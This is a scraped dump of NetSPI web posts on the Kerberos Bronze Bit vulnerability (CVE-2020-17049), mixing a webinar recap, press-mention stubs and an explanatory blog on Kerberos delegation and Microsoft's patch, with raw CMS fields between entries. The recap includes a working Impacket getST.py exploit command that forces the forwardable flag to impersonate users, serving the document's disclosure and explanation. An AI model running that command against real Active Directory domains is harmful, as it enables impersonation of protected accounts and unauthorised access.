    • While unconstrained delegation means this service can delegate authentication to any service, constrained delegation means this service can delegate authentication to only these services  
    • With protocol transition 
    • Without protocol transition 
  • Resource-based constrained delegation  

With constrained delegation, one service can get a ticket to another service impersonating a user in the S4U2Proxy exchange. Here are the steps in the process:

  • One service obtains a service ticket to another service as a user, without needing that user’s TGT 
  • The first service presents the user’s service ticket as evidence, along with the services’ own TGT 
  • This is done “without protocol transition” because it assumes the user authenticated to the first service using Kerberos 

If the user hasn’t authenticated to the first service with Kerberos in the first place, the service can still delegate authentication through the S4U2Self exchange. Here’s what this process looks like:

  • Obtains a service ticket to itself as a user, without needing that user’s service ticket 
  • Required when the user authenticates to the first service through another protocol  
    • NTLM v2 
  • Slight modification of the ticket-granting exchange 
  • With the newly obtained service ticket, the first service can perform the S4U2Proxy exchange 

Because the ability to obtain a service ticket on behalf of another user is powerful functionality, protections are in place within constrained delegation. Protections include:

  • Allowing and disallowing protocol transition 
    • If you trust the service to perform the protocol transition, you trust it to impersonate users who never connected to the service  
    • “TrustedToAuthForDelegation” in Active Directory 
  • Protected users and sensitive accounts 
    • Accounts can be protected from delegation entirely 
    • Protected users groups  
    • “Account is sensitive and can’t be delegated” 
  • Enforcing constrained delegation lists 
    • It’s constrained delegation for a reason  

Here’s a simplified overview and recap of Kerberos delegation:

  • Service1 sends an authentication service request with a timestamp encrypted with Service1’s hash to obtain a TGT 
  • The KDC sends a ticket-granting ticket for Service1 
  • Service1 sends a S4U2Self request for the target user, sending Service1’s TGT 
  • The KDC sends a service ticket for the target user to Service1 
  • Service1 sends a S4U2Proxy request for the user for Service2, sending the service ticket 
  • KDC sends the service ticket as the target user for Service2 
  • Request is sent to Service2 using the service ticket to impersonate the target user 

The vulnerability and what it bypasses 

The vulnerability arises because the service ticket, including its forwardable flag, is protected only by encryption with the service’s own key. Since a compromised service always has access to its own secret key, all of the protections above can be bypassed: the attacker can decrypt the ticket, flip the flag, and re-encrypt it.  

Here’s an overview of what the attack would look like (an example Impacket invocation follows the list):

  • The attacker sends an authentication service request with a timestamp encrypted with Service1’s hash to obtain a TGT 
  • The KDC sends a ticket-granting ticket for Service1 to the attacker 
  • The attacker sends a S4U2Self request for the target user, sending Service1’s TGT 
  • The KDC sends a non-forwardable service ticket for the target user to Service1 
  • The attacker decrypts the service ticket, sets the forwardable flag, and re-encrypts the service ticket 
  • The attacker then sends a S4U2Proxy request for the user for Service2, sending the modified service ticket 
  • The KDC observes that the ticket is forwardable and checks if there is a constrained delegation trust relationship between Service1 and Service2 and the check succeeds 
  • The KDC sends the service ticket as the target user for the victim service 
  • The attacker sends a request to the victim service to impersonate the target user 
  • The victim service processes the request under the protected user’s authorization  
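
For reference, the published exploit implements this flow via Impacket’s getST.py with the new force-forwardable flag. A sketch with placeholder values (the SPN, account names and NT hash are all assumptions):

# Obtain a service ticket to Service2 as the target user, flipping the forwardable bit along the way
getST.py -spn cifs/service2.domain.local -impersonate targetuser -hashes :<Service1-NT-hash> -force-forwardable domain.local/service1account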

In this type of attack, the protections bypassed include:

  • Bypassed TrustToAuthForDelegation 
    • Even if protocol transition is disallowed (i.e. Service1 is configured with “- Use Kerberos only”), they can still impersonate users 
    • No user needs to connect to Service1 to impersonate them  
  • Impersonating “protected” and “sensitive” users 
    • Any user in the domain can be impersonated  

Microsoft patches 

Microsoft has implemented several fixes for this Kerberos vulnerability, including:

  • November 10, 2020 
    • Microsoft publicly announces CVE-2020-17049 
    • Initial patch enables “ticket signatures” in the PAC 
  • December 8, 2020 
    • The “ticket signatures” patch ported to Windows Server 2008 SP2 and Windows Server 2008 R2 
    • NetSPI blogs published 
    • Exploit published as an addition to Impacket 
  • February 9, 2021 
    • “Enforcement mode” of ticket signatures is enabled 

Learn more about CVE-2020-17049: Kerberos Bronze Bit Attack 

If you’re interested in learning more about CVE-2020-17049: Kerberos Bronze Bit Attack, the risks associated, and how to protect your business, NetSPI has published several articles on the topic, linked below.

Watch the full webinar recording: https://youtu.be/dfJd7gOB8sE

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Explained and Exploited [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-attack-explained-and-exploited [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:08:13 [post_modified_gmt] => 2023-09-01 12:08:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://localhost/netspi/?post_type=webinars&p=21082 [menu_order] => 63 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 20705 [post_author] => 52 [post_date] => 2020-12-10 07:00:07 [post_date_gmt] => 2020-12-10 07:00:07 [post_content] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Bleeping Computer: Proof-of-concept exploit code and full details on a Windows Kerberos security bypass vulnerability have been published earlier this week by Jake Karnes, the NetSPI security consultant and penetration tester who reported the security bug to Microsoft. The security bug tracked as CVE-2020-17049 and patched by Microsoft during November 2020's Patch Tuesday can be exploited in what the researcher has named as Kerberos Bronze Bit attacks. Read the full article here: https://www.bleepingcomputer.com/news/security/windows-kerberos-bronze-bit-attack-gets-public-exploit-patch-now/ [post_title] => Bleeping Computer: Windows Kerberos Bronze Bit attack gets public exploit, patch now [post_excerpt] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Bleeping Computer. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bleeping-computer-windows-kerberos-bronze-bit-attack-gets-public-exploit-patch-now [to_ping] => [pinged] => [post_modified] => 2021-04-14 05:30:12 [post_modified_gmt] => 2021-04-14 05:30:12 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20705 [menu_order] => 440 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 20711 [post_author] => 52 [post_date] => 2020-12-10 07:00:06 [post_date_gmt] => 2020-12-10 07:00:06 [post_content] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Trimarc:

Jake Karnes (@jakekarnes42) with NetSPI published 3 articles (that’s right 3!) describing a new attack against Microsoft’s Kerberos implementation in Active Directory. He posted an Overview article, describing how the attack works, an Attack article on practical exploitation, and if you need further background on Kerberos, a Theory article.

This article attempts to summarize the key details of the attack and provide some expanded information and potential attack scenarios, including how Active Directory could be compromised leveraging this attack method.

Read the full article here: https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory [post_title] => Trimarc: Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory [post_excerpt] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Trimarc. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => trimarc-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-potentially-compromise-active-directory [to_ping] => [pinged] => [post_modified] => 2021-04-14 05:29:33 [post_modified_gmt] => 2021-04-14 05:29:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20711 [menu_order] => 439 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 20698 [post_author] => 52 [post_date] => 2020-12-10 07:00:05 [post_date_gmt] => 2020-12-10 07:00:05 [post_content] => On December 10, NetSPI Security Consultant Jake Karnes was featured in ZDNet: Proof-of-concept exploit code has been published this week for a new attack technique that can bypass the Kerberos authentication protocol in Windows environments and let intruders access sensitive network-connected services. Named the Bronze Bit attack, or CVE-2020-17049, patching this bug caused quite the issue for Microsoft already. The OS maker delivered an initial fix for Bronze Bit attacks in the November 2020 Patch Tuesday, but the patch caused authentication issues for Microsoft's customers, and a new update had to be deployed this month to fix the previous issues. On Wednesday, a day after Microsoft delivered the final patches, Jake Karnes, a security engineer at NetSPI, published a technical breakdown of the vulnerability so network defenders can understand how they are vulnerable and why they need to update, despite the patching process' rocky start. Read the full article here: https://www.zdnet.com/article/proof-of-concept-exploit-code-published-for-new-kerberos-bronze-bit-attack/ [post_title] => ZDNet: Proof-of-concept exploit code published for new Kerberos Bronze Bit attack [post_excerpt] => On December 10, NetSPI Security Consultant Jake Karnes was featured in ZDNet. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => zdnet-proof-of-concept-exploit-code-published-for-new-kerberos-bronze-bit-attack [to_ping] => [pinged] => [post_modified] => 2021-04-14 05:30:19 [post_modified_gmt] => 2021-04-14 05:30:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20698 [menu_order] => 441 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 11799 [post_author] => 52 [post_date] => 2020-12-08 07:00:48 [post_date_gmt] => 2020-12-08 07:00:48 [post_content] =>

Introduction and Background

This attack expands upon the excellent research documented by Elad Shamir in “Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory.” I’ll cover the key points below, but his article is a great resource and primer for Kerberos and constrained delegation in AD.

If you’re already familiar with the Kerberos fundamentals, feel free to skip to the Kerberos Delegation section. And if you already have a good grasp on delegation (or read the article linked above), you can jump straight into the vulnerability here. If you want to skip this background knowledge entirely and jump straight into the exploit, please see my CVE-2020-17049: Kerberos Bronze Bit Attack - Practical Exploitation post.

I’ll acknowledge upfront that Kerberos is a complex protocol with many extensions, options and details. Of course, all of these are very important when discussing a security system but they cannot all be captured in a blog post. The explanations below provide a simplified view of Kerberos and Active Directory, focusing on the key points to understand the discovered weakness and its exploit.

Kerberos 101

Kerberos is a protocol used in Windows Active Directory to authenticate users, servers and other resources to each other within a domain. Kerberos is based on symmetric key cryptography where each principal has a long-term secret key. This secret key is only known by the principal themselves and the Key Distribution Center (KDC). In an AD environment, the domain controller performs the role of the KDC. In the illustration below, we can see the KDC has a copy of the user’s key, the service’s key, and its own key.

Kerberos Participants

With its knowledge of each principal’s secret key, the KDC facilitates authentication of one principal to another by issuing “tickets.” These tickets contain metadata, authorization information and additional secret keys which can be used with future tickets. Let’s explore how these tickets are created and used by principals to authenticate to each other.

Authentication Service Exchange

Before principals can authenticate to each other, they must authenticate themselves to the KDC. Let’s take a look at the process of a user authenticating themselves to the KDC through the “Authentication Service Exchange.”

The Authentication Service (AS) Exchange

The user derives their secret key by hashing their password. The secret key is used to encrypt a timestamp, which is sent to the KDC along with their username. Based on the username, the KDC gets its copy of the secret key for that user. The KDC then decrypts the timestamp. If the decryption is successful, this proves that the user has access to the secret key. If the timestamp were encrypted with any other key, it wouldn’t decrypt successfully with the user’s key. And if the timestamp is recent, it proves that this isn’t a replay attack (i.e. the user isn’t sending some old, captured encrypted timestamp). If the user is using a smartcard or Windows Hello for Business instead of a password, the user and KDC will establish key agreement via ephemeral Diffie-Hellman instead of the encrypted timestamp, but the rest of the Kerberos process will remain the same.

The AS_REP reply

Once the checks pass, the KDC will create a new random logon session key, and send back an “AS_REP” reply. This AS_REP is a pretty complex data structure, so let’s consider a simplified representation:

The “cname” field contains the username in plaintext. The rest of the data is split into two halves, each encrypted with a different key. The first “enc-part” section of the response is encrypted with the user’s secret key. Only the user themselves can read these contents. It contains some metadata (such as “flags” and “sname” fields), and the logon session key that the KDC generated.

The last section is called the “Ticket-Granting Ticket” or TGT. This is encrypted with the KDC’s secret key which means the user cannot read the contents of this section.

The user can extract the logon session key from the readable “enc-part” and the TGT from the AS_REP, and save these in their key cache for later use. The TGT can now serve as evidence that this user has already been authenticated by the KDC. I like to think of the TGT like the stamp you get on your hand when leaving an amusement park. The fact that your hand is stamped shows you were already allowed to be inside, so they’ll let you back in without buying another pass.
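
On a domain-joined Windows host, the contents of this key cache can be listed with the built-in klist utility:

PS C:\> klist       # list the current logon session's cached Kerberos tickets
PS C:\> klist tgt   # show details of the cached Ticket-Granting Ticket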

The TGT is a very powerful authentication artifact which enables the user to prove their identity and obtain access to other services within the domain. If an attacker had access to the KDC’s secret key, they could forge these tickets to impersonate any user to any other service. This is known as a Golden Ticket attack discovered by Benjamin Delpy.

Ticket-Granting Service Exchange

The Ticket-Granting Service (TGS) Exchange

After obtaining the logon session key and TGT, the user can now obtain tickets for other specific services through the Ticket-Granting Exchange:

The user begins by encrypting another timestamp, but now using the logon session key rather than their secret key. This encrypted timestamp is sent to the KDC, along with the TGT and which service the user is requesting a ticket for. The KDC decrypts the TGT using its secret key and extracts the logon session key. The KDC then confirms the user’s encrypted timestamp using the logon session key and, if the checks pass, will generate a new random service session key. The KDC sends back a “TGS_REP” reply and the exchange is complete.

Let’s inspect that TGS_REP data structure as we did before:

The TGS_REP reply

The data structure is the same as the AS_REP, with some important differences in the values. The “enc-part” is now encrypted with the logon session key and contains the new service session key. The user can decrypt the “enc-part” using the logon session key from the key cache, extract the service session key and save it alongside the service ticket in the key cache.

The service ticket is encrypted with the service’s long-term secret key and therefore can only be read by the service and KDC who have the service’s secret key, not the user. You’ll notice that its structure looks the same as the TGT, and that’s no accident. The TGT is just a service ticket to the KDC's Ticket Granting Service. Let’s take a closer look at those parts within the service ticket:

  • Session key: The service session key generated by the KDC which will be shared by both the user and the service.
  • Flags: A collection of binary values (only 0 or 1) which provide metadata for the ticket. The “Forwardable” flag is one of several available flags and will be discussed in detail later.
  • “cname”: The client name (i.e. an identifier for the user associated with this service ticket).
  • PAC: The user’s authorization data in a structure known as the privilege attribute certificate or PAC. This contains additional user metadata such as their group memberships. The PAC contains two cryptographic signatures. One signature created with the service’s key and the other created with the KDC’s key. Because of these dual signatures, the PAC is effectively tamper-proof.

It's also worth noting that the "sname" field (which identifies the service's name) is not in the encrypted service ticket. This allows for interesting sname substitution attacks as first described by Alberto Solino.

Client/Server Exchange

With a service ticket and a service session key, the user is finally ready to authenticate to the service.

The Client/Server Exchange (KRB_AP_REQ)

I think we can see the familiar pattern here. A timestamp is encrypted with the service session key, and sent from the user to the service along with the service ticket. The service decrypts the ticket with its long-term key. This proves the ticket came from the KDC, since only the KDC and the service itself should have the long-term key to create such a service ticket. The service session key is extracted from the service ticket and used to validate the timestamp.

The service will then use its long-term key to check the signature of the PAC. This provides the user’s authorization upfront, so the service doesn’t need to fetch it from the KDC. Optionally, the service may choose to send the PAC to the KDC, so that the KDC may validate the second signature against the KDC’s key. If performed, this optional check verifies that the PAC has not been altered from when it was first created by the KDC and helps prevent attempts to forge the PAC and escalate privileges.

Once these checks are performed and passed, the user has successfully authenticated to the service, the service is aware of the user’s authorization, and the user may proceed with any requests.

Like the TGT, if an attacker can forge a valid service ticket to a particular service, then it can impersonate any user and authenticate to that service. This is known as a “Silver Ticket” attack and requires knowledge of the service’s secret key. A popular technique for obtaining a service’s secret key is “Kerberoasting” discovered by Tim Medin. However, this attack is thwarted if the service performs the optional step of sending the PAC to the KDC. The KDC will observe that its signature for the PAC is incorrect (because the attacker doesn’t have the KDC’s secret key), and it will report that error back to the service which will reject the service ticket.

Kerberos Delegation

Now that we understand the fundamentals of how Kerberos authenticates a user to a service, consider the following: what if that service wants to send requests to another service on the user’s behalf? A common scenario would be when a user authenticates to a web application, and that web application needs to access a database under the user’s authority. The database controls whether a given user is allowed to access a particular record. When the web application attempts to access a database record, it must carry the user's authorization in the request to allow the database to determine if the request should be allowed or denied. This is sometimes referred to as the “double-hop” scenario.

For our examples going forward, “Service1” will be the service which the user is directly authenticated to, and “Service2” will be the additional service which needs to be accessed under the user’s authority.

The “double-hop” delegation scenario

This problem is addressed through “Kerberos delegation” which allows Service1 to impersonate the user and interact with Service2 as if the requests came directly from the user. There are several types of Kerberos delegation supported in Active Directory, which will be discussed in detail below.

The following screenshot captures where most of the delegation configuration lives in Active Directory:

Delegation configuration options in Active Directory

Unconstrained Delegation

Although the vulnerability doesn’t impact this configuration, unconstrained delegation should be avoided. Let’s consider that Service1 has been configured for unconstrained delegation with the “Trust this computer for delegation to any service (Kerberos only)” setting above. When a user obtains a service ticket to Service1, the KDC will embed the user’s TGT into the service ticket. When the service ticket is passed to Service1, the service can extract the TGT. With access to the user’s TGT, Service1 can perform the Ticket-Granting Service Exchange, and obtain service tickets as the user to any other service. This allows complete impersonation of the user.

Issues arising from unconstrained delegation are well-known and have been discussed thoroughly by Will Schroeder here and Sean Metcalf here. Since this is no longer recommended, may not even be supported, and not directly related to the vulnerability, I’ll refer you to those great resources for a deeper dive.

Constrained Delegation

Due to the potential issues with unconstrained delegation, Microsoft introduced the concept of “constrained delegation” in its Windows Server 2003 release, and published [MS-SFU]: Service for User and Constrained Delegation Protocol as a public specification and Kerberos extension in 2007. Unlike unconstrained delegation, the extension would allow for services’ delegation targets to be predefined. Using our running example, it could be configured that Service1 is only allowed to delegate to Service2, instead of every service in the domain. When the user obtains a service ticket for Service1, the KDC would no longer embed the user’s TGT into the service ticket.

Constrained Delegation without Protocol Transition

Let’s consider that a user has authenticated to Service1 through Kerberos, passing their service ticket, and now Service1 needs to access Service2 under the user’s authority. Because the user’s service ticket is specific to Service1, it would be rejected if passed directly to Service2. Without the user’s TGT, Service1 cannot obtain a service ticket to Service2 from the KDC. So how does the Service1 authenticate to Service2 as the user?

The MS-SFU specification solves this problem through the “Service for User to Proxy” (S4U2proxy) protocol. The S4U2proxy protocol allows Service1 to obtain a service ticket to Service2 as the user, by sending the KDC the service ticket it received from the user, along with Service1's own TGT. The KDC will reply with a "TGS_REP" including a service ticket which is valid for Service2, authorized as the user. Once Service1 has a service ticket as the user to Service2, it can proceed with the same Client/Server exchange as before. After that exchange is complete, Service2 will process the requests from Service1 as if they came from the user themselves.

The S4U2proxy Exchange

The S4U2proxy protocol allows for constrained delegation “without protocol transition” because the Kerberos protocol is used for every step. All principals are authenticated to each other through Kerberos and its ticket exchanges.

Constrained Delegation with Protocol Transition

What if the user authenticated to Service1 by a protocol other than Kerberos? For example, Service1 may have authenticated the user through NTLM v2 Authentication. If Service1 then needed to delegate that authentication to Service2, it would be unable to do so. The user never presented a service ticket to Service1, so Service1 cannot pass that service ticket to the KDC in the S4U2proxy protocol. In this case, Service1 would need to perform a “protocol transition” using the second protocol provided in the MS-SFU specification: the “Service for User to Self” (S4U2self) protocol.

The S4U2self protocol allows a service to obtain a service ticket to itself on behalf of any user. The protocol is a modification of the Ticket-Granting Exchange. Service1 presents its own TGT and timestamp encrypted with its logon session key to the KDC and specifies which user it would like a ticket for. The KDC processes the request, performing the same validations as before, and returns a service ticket for Service1 which identifies the specified user as the client in the “cname” field.

The S4U2self Exchange

Now that Service1 has obtained a service ticket to itself, it can present this ticket as evidence in the S4U2proxy exchange and obtain a service ticket to Service2 on the user’s behalf.

It’s important to note that a service can obtain a service ticket to itself on behalf of any user through the S4U2self protocol. The service is not required to present any evidence that the user has actually authenticated to the service.

Resource-Based Constrained Delegation (RBCD)

When Microsoft first introduced the concept of Kerberos constrained delegation, it was only possible to define a list of services which a specified service could delegate to. For example, a domain admin could specify that ServiceA is allowed to delegate Kerberos authentication to ServiceB, ServiceC and ServiceD. The list of delegation targets would be configured in the “AllowedToDelegateTo” property of ServiceA in Active Directory.

Resource-based Constrained Delegation flips this model. Introduced in Windows Server 2012, RBCD lets a service define which other services it accepts delegated Kerberos authentication from. For example, a privileged user (not necessarily a domain admin) could specify that ServiceW accepts delegated Kerberos authentication from ServiceX, ServiceY and ServiceZ. This list would be configured in the “PrincipalsAllowedToDelegateToAccount” property of ServiceW in Active Directory.

After the introduction of RBCD, the existing constrained delegation became unofficially known as “classic” constrained delegation.

Constrained Delegation Comparison
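
To make the two models concrete, here’s a minimal sketch of how each list could be set with the ActiveDirectory PowerShell module. The account names and SPN are the hypothetical ones from the examples above, so adjust them for a real environment:

# “Classic” constrained delegation: the target list lives on the delegating service (ServiceA)
Set-ADComputer ServiceA -Add @{'msDS-AllowedToDelegateTo'=@('cifs/ServiceB.domain.local')}

# Resource-based constrained delegation: the list lives on the target resource (ServiceW)
Set-ADComputer ServiceW -PrincipalsAllowedToDelegateToAccount (Get-ADComputer ServiceX)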

Protections Within Constrained Delegation

While its scope is narrower than unconstrained delegation’s, constrained delegation still allows for the impersonation of users and therefore needs strong security controls to limit its potential impact if abused. Microsoft provides a variety of configuration options to balance security and functionality.

Allowing and Disallowing Protocol Transition

When using “classic” constrained delegation, the sysadmin must decide if the service is allowed to perform the “protocol transition” described previously. If so, the service will be permitted to impersonate users who haven’t already been authenticated through Kerberos. This trusts that the service will only impersonate users who it has authenticated through another mechanism.

If the service is trusted for constrained delegation with protocol transition, then the “TrustedToAuthForDelegation” property in Active Directory is enabled. This corresponds to the “Trust this computer for delegation to specified services only – Use any authentication protocol” option in the AD GUI.

If the service is trusted for constrained delegation without protocol transition, then the “TrustedToAuthForDelegation” property in Active Directory is not enabled but the AllowedToDelegateTo list is still populated with delegation targets.  This corresponds to the “Trust this computer for delegation to specified services only – Use Kerberos only” option in the AD GUI. This restriction is enforced by the S4U2self protocol. While any service can perform the S4U2self exchange to obtain a service ticket to itself as any user, if protocol transition is not allowed then the resulting service ticket will have its Forwardable flag set to 0. When a service ticket with a Forwardable flag of 0 is passed in the subsequent S4U2proxy exchange, the exchange will fail.

Effectively, “TrustedToAuthForDelegation” allows a service to use both the S4U2self and the S4U2proxy protocols successfully. If a service is not "TrustedToAuthForDelegation" but has a non-empty AllowedToDelegateTo list, then the service may use S4U2self successfully, but the service can only pass forwardable tickets to S4U2proxy. The service should only obtain forwardable tickets from users that have already authenticated through Kerberos with the KDC directly, preventing impersonation.
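
As a quick way to see how a given service account is configured, the following sketch (assuming the ActiveDirectory module and a hypothetical computer account named Service1) queries both properties discussed above:

# TrustedToAuthForDelegation => “Use any authentication protocol” (protocol transition allowed)
# msDS-AllowedToDelegateTo   => the “classic” constrained delegation target list
Get-ADComputer Service1 -Properties TrustedToAuthForDelegation,'msDS-AllowedToDelegateTo' |
    Select-Object Name, TrustedToAuthForDelegation, 'msDS-AllowedToDelegateTo'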

Protected Users and Sensitive Accounts

Services aren’t the only principals with security restrictions applied. Users and other AD accounts can be configured to disallow delegation of their authentication. This means that even if a service is allowed to perform delegation (of any kind), the service cannot delegate and impersonate the user. There are two ways of protecting an account from delegation.

First, a sysadmin can enable the “Account is sensitive and cannot be delegated” setting in Active Directory for the account. The screenshot below shows how this is displayed in the AD GUI.

Account Is Sensitive

The second option is to add the account to the “Protected Users” security group in AD. Members of this group cannot have their authentication delegated, and the group applies several other protections as well.

Protected Users Group

Like the “Use Kerberos only” restriction discussed in the previous section, this protection is enforced by ensuring that all tickets issued for these users are not forwardable. When a ticket is created for a user with the “account is sensitive and cannot be delegated” setting, or if the user is a member of the “Protected Users” group, then the Forwardable flag value will always be 0. A service can still obtain a ticket for these users to itself through the S4U2self protocol, but since the ticket is not forwardable, it cannot be successfully used in the S4U2proxy protocol to obtain a ticket for another service.
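
Both protections can also be applied from PowerShell. A short sketch, assuming a hypothetical account named User2:

# Option 1: set the “Account is sensitive and cannot be delegated” flag
Set-ADAccountControl -Identity User2 -AccountNotDelegated $true

# Option 2: add the account to the Protected Users group
Add-ADGroupMember -Identity 'Protected Users' -Members User2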

Enforcing Constrained Delegation Lists

Of course, the KDC must also enforce the constrained delegation lists discussed previously. This is only applicable during the S4U2proxy protocol. Let’s return to our example of Service1 attempting to delegate authentication to Service2. During the S4U2proxy protocol, the KDC will confirm that Service2 is in Service1’s “AllowedToDelegateTo” list (allowing “classic” constrained delegation) or that Service1 is in Service2’s “PrincipalsAllowedToDelegateToAccount” list (allowing resource-based constrained delegation). If neither of those conditions is met, then the exchange fails. This prevents a service from performing constrained delegation to another unless one of them has been explicitly configured to allow it.

The Big Picture

Now that we’ve covered the fundamentals of Kerberos, constrained delegation, and its protections, let’s bring all of this together. Let’s consider that Service1 wants to authenticate to Service2 as another user, but the user has not already authenticated to Service1 through Kerberos.

Service1 starts with the standard Authentication Service exchange. Like before, it encrypts a timestamp with its long-term secret key to prove its identity. The KDC validates the timestamp and returns a logon session key and a ticket-granting ticket (TGT) in an AS_REP response.

Kerberos Constrained Delegation Overview Complete

Service1 extracts the logon session key and TGT from the AS_REP, then continues to the S4U2self exchange. Service1 encrypts another timestamp with the logon session key. Service1 sends the encrypted timestamp, its TGT and the target user’s name to the KDC, requesting a ticket to itself through the S4U2self protocol. The KDC will validate the incoming TGT and timestamp. If this passes, the KDC prepares a service ticket for the specified user to Service1. Initially, the service ticket’s forwardable flag is set (i.e. Forwardable=1).

The KDC will check if Service1 has the “TrustedToAuthForDelegation” property set. If not, the service ticket’s forwardable flag is set to 0. The KDC will also check if the target user is protected from delegation. If the user is a member of the “Protected Users” group or configured with the “Account is sensitive and cannot be delegated” setting, then the forwardable flag in the service ticket is set to 0.

The KDC returns the new service ticket to Service1. Service1 now has a valid ticket as the user to itself, which may or may not be forwardable.
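
The combined decision is small enough to capture in a toy model. This is only an illustration of the rules described above, not actual KDC code:

# Toy model of how the KDC decides the forwardable flag during S4U2self
function Get-S4U2SelfForwardableFlag {
    param(
        [bool]$ServiceTrustedToAuthForDelegation,  # Service1's TrustedToAuthForDelegation property
        [bool]$UserProtectedFromDelegation         # Protected Users member or "sensitive" account
    )
    $forwardable = $true                            # the ticket starts out forwardable
    if (-not $ServiceTrustedToAuthForDelegation) { $forwardable = $false }
    if ($UserProtectedFromDelegation)            { $forwardable = $false }
    return $forwardable
}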

Kerberos Constrained Delegation Overview Complete

Service1 is now ready for the final step: the S4U2proxy Exchange. Service1 presents the service ticket it received back to the KDC as proof of the user’s authentication to Service1, and Service1 requests a new service ticket to Service2 as the user. The KDC begins by confirming that there is a delegation trust relationship between Service1 and Service2. It checks if Service2 is in Service1’s “AllowedToDelegateTo” list. If so, a classic constrained delegation trust relationship is confirmed. If not, the KDC checks if Service1 is in Service2’s “PrincipalsAllowedToDelegateToAccount” list. If so, a resource-based constrained delegation trust relationship exists. If both checks fail, the exchange fails with an error.

After confirming that Service1 is allowed to delegate authentication to Service2, the KDC decrypts the received service ticket using Service1’s long-term secret key and checks the Forwardable flag. If the service ticket’s Forwardable flag is set to 0, the exchange will fail with an error. If the Forwardable flag is set to 1, the KDC will return a new service ticket which is valid for Service2 as the target user.

Kerberos Constrained Delegation Overview Complete

Spot the Problem

There you go! You now have all the information necessary to spot what is wrong in this authentication protocol. If you’d like, take a second to review the information covered so far and see if you can find the vulnerability. When you’re ready, continue down to the next section.

Flipping Bits for Fun and for Profit

Let’s take a closer look at the TGS_REP data structure returned by the KDC after the S4U2self exchange. Consider the scenario where Service1 is not “TrustedToAuthForDelegation” or the specified user is protected from delegation (because it is a member of the “Protected Users” group or it is configured with the “Account is sensitive and cannot be delegated” setting). Here’s how that TGS_REP could look:

S4U2self Exchange TGS_REP

Because of the protections in place, the Forwardable flag is not set (i.e. its value is 0). This means that the service ticket would be rejected if used as proof in the S4U2proxy exchange.

Look closely at where the Forwardable flag is located in the response. The service ticket’s Forwardable flag is encrypted with Service1’s long-term key. The Forwardable flag is not in the signed PAC. Service1 is free to decrypt the ticket, set the Forwardable flag’s value to 1, and re-encrypt it. Because the flag is not in the signed PAC, the KDC is unable to detect that the value has been tampered with.

Bit Flip Animation Cropped

Voila! We have converted a non-forwardable ticket into a forwardable ticket. This forwardable service ticket can be provided as proof in the S4U2proxy exchange, allowing us to delegate authentication to Service2, as any user of our choice.
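
The arithmetic of the flip itself is trivial once the ticket is decrypted. Here’s a small PowerShell illustration using an example 32-bit flags value (the decryption and re-encryption steps are omitted):

# TicketFlags is a 32-bit field; "forwardable" is the second-most-significant bit (0x40000000)
$flags   = [Convert]::ToUInt32('00000000101000010000000000000000', 2)
$patched = $flags -bor 0x40000000
[Convert]::ToString($patched, 2).PadLeft(32, '0')   # 01000000101000010000000000000000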

Protections Bypassed

Recall the protections discussed earlier. By flipping the forwardable bit, we’re bypassing two of the three protections:

  1. We’ve bypassed the protection for TrustedToAuthForDelegation and the “Trust this computer for delegation to specified services only – Use Kerberos only” configuration. This protection is enforced by ensuring that any service ticket received in the S4U2self exchange is non-forwardable, unless the requesting service is TrustedToAuthForDelegation. By setting the forwardable flag ourselves, we’ve effectively removed this distinction and enabled the service to perform the protocol transition, as if the service were configured with the “Trust this computer for delegation to specified services only – Use any authentication protocol” option.
  2. We’ve also bypassed the protection for accounts which do not allow delegation. Again, this is enforced by ensuring that any service ticket received in the S4U2self exchange on behalf of a protected account is non-forwardable. By converting this to a forwardable service ticket, the service can now delegate the account’s authentication as if there was no such protection.

Microsoft's Patch

Microsoft has released multiple patches throughout November and December 2020 to fix this vulnerability. The various patches can be found in the MSRC Security Update Guide for CVE-2020-17049 and their rollout plan and advice can be found here.

Because the "Service for User and Constrained Delegation Protocol" (MS-SFU) is an open specification, we can get a good idea of how the fix was implemented. MS-SFU revision 19.0 published on November 23, 2020 now contains the underlined addition to section 3.2.5.2.2:

Service 1's KDC verifies both server ([MS-PAC] section 2.8.1) and KDC ([MS-PAC] section 2.8.2) signatures of the PAC. Because Service 1’s KDC is ingesting a service ticket rather than a TGT, it SHOULD also ensure the integrity of the service ticket by verifying the ticket  signature ([MS-PAC] section 2.8.3). If Service 2 is in another domain, then its KDC verifies only the KDC signature of the PAC.

The specification now references a "ticket signature" which should be verified by the KDC along with the existing PAC. Let's look at that referenced section of the MS-PAC specification. We can see that revision 20.0 was published on the same day and added Section 2.8.3. I think the following snippet of that section best captures the core change:

The ticket signature is used to detect tampering of tickets by parties other than the KDC. The ticket signature SHOULD be included in tickets that are not encrypted to the krbtgt account (including the change password service) or to a trust account. The KDC signature is a keyed hash [RFC4757] of the ticket being issued less the PAC itself.

